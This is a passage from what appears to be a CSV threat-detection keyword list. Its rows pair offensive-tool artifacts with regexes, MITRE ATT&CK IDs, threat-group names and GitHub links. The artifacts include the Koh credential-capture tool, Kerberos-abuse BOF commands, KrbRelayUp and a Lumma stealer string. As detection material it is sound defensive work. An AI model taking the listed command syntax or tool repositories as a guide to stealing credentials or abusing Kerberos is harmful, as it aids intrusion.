Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50546" "*Koh.exe list*",".{0,1000}Koh\.exe\slist.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50547" "*Koh.exe monitor*",".{0,1000}Koh\.exe\smonitor.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","50548" "*Komedx765eta\\Usedx765er Daedx765ta*",".{0,1000}Komedx765eta\\\\Usedx765er\sDaedx765ta.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","50549" "*kontakt@redteam-pentesting.de*",".{0,1000}kontakt\@redteam\-pentesting\.de.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","50550" 
"*kost/revsocks*",".{0,1000}kost\/revsocks.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","50551" "*kpcyrd/badtouch*",".{0,1000}badtouch.{0,1000}","offensive_tool_keyword","badtouch","Scriptable network authentication cracker","T1110 - T1210.001 - T1558.003","TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/kpcyrd/badtouch","1","0","N/A","N/A","N/A","5","410","45","2023-12-19T14:50:40Z","2018-03-15T22:27:56Z","50552" "*kpfopkelmapcoipemfendmdcghnegimn*",".{0,1000}kpfopkelmapcoipemfendmdcghnegimn.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","50553" "*KPortScan.exe*",".{0,1000}KPortScan\.exe.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","Dispossessor","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","N/A","8","1","2","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z","50555" "*KPortScan.rar*",".{0,1000}KPortScan\.rar.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","Dispossessor","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","N/A","8","1","2","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z","50556" "*KPortScan.zip*",".{0,1000}KPortScan\.zip.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - 
TA0001","N/A","Dispossessor","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","N/A","8","1","2","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z","50557" "*KPortScan3.exe*",".{0,1000}KPortScan3\.exe.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","Dispossessor","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","N/A","8","1","2","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z","50558" "*kr.mirrors.cicku.me/blackarch/*/os/*",".{0,1000}kr\.mirrors\.cicku\.me\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","50559" "*krackattacks*",".{0,1000}krackattacks.{0,1000}","offensive_tool_keyword","krackattacks-scripts","This project contains scripts to test if clients or access points (APs) are affected by the KRACK attack against WPA2. For details behind this attack see our website and the research paper.","T1170 - T1555.003 - T1583.002","TA0003 - TA0007 - TA0010","N/A","N/A","Reconnaissance","https://github.com/vanhoefm/krackattacks-scripts","1","0","N/A","N/A","N/A","10","3396","768","2024-12-25T20:42:57Z","2017-10-18T12:58:08Z","50560" "*Kraken Mask by @DallasFR*",".{0,1000}Kraken\sMask\sby\s\@DallasFR.{0,1000}","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). 
To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","N/A","N/A","9","","N/A","","","","50561" "*kraken.py --connect --mode * --profile * --compiler *",".{0,1000}kraken\.py\s\-\-connect\s\-\-mode\s.{0,1000}\s\-\-profile\s.{0,1000}\s\-\-compiler\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50562" "*Kraken-1.2.0.zip*",".{0,1000}Kraken\-1\.2\.0\.zip.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","1","N/A","N/A","10","10","538","47","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z","50563" "*KrakenMask-main*",".{0,1000}KrakenMask\-main.{0,1000}","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). 
To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","N/A","9","","N/A","","","","50564" "*kraken-ng/Kraken*",".{0,1000}kraken\-ng\/Kraken.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","1","N/A","N/A","10","10","538","47","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z","50565" "*krb_asktgs /*",".{0,1000}krb_asktgs\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - 
Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50566" "*krb_asktgt /*",".{0,1000}krb_asktgt\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50567" "*krb_asreproasting*",".{0,1000}krb_asreproasting.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50568" "*krb_changepw /*",".{0,1000}krb_changepw\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos 
abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50569" "*KRB_CRED kirbi *",".{0,1000}KRB_CRED\skirbi\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege 
Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","50570" "*KRB_CRED(kirbiBytes)*",".{0,1000}KRB_CRED\(kirbiBytes\).{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","50571" "*krb_cross_s4u /*",".{0,1000}krb_cross_s4u\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - 
Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50572" "*krb_describe /*",".{0,1000}krb_describe\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50573" "*krb_dump /*",".{0,1000}krb_dump\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50574" "*krb_hash /password*",".{0,1000}krb_hash\s\/password.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse 
(an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50575" "*krb_klist /*",".{0,1000}krb_klist\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 